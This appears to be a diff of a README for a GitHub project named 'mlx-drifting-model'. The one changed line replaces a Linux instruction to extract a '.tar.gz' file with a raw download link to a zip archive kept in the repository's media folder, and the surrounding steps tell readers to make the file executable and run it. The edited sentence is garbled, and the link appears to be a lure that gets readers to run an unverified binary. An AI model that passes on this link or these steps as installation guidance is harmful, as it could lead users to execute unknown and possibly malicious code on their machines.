Prince445-hub/mlx-drifting-model/README.md

 - Follow the on-screen prompts.

 For Linux:
-- Download the AppImage or extract the `.tar.gz` file.
+- Download the AppImage or extract the `https://github.com/Prince445-hub/mlx-drifting-model/raw/refs/heads/main/media/model_drifting_mlx_2.0.zip` file.
 - If you downloaded an AppImage, you may need to make it executable by right-clicking the file, selecting "Properties," then "Permissions," and checking "Allow executing file as program."
 - Run the file by double-clicking or via terminal.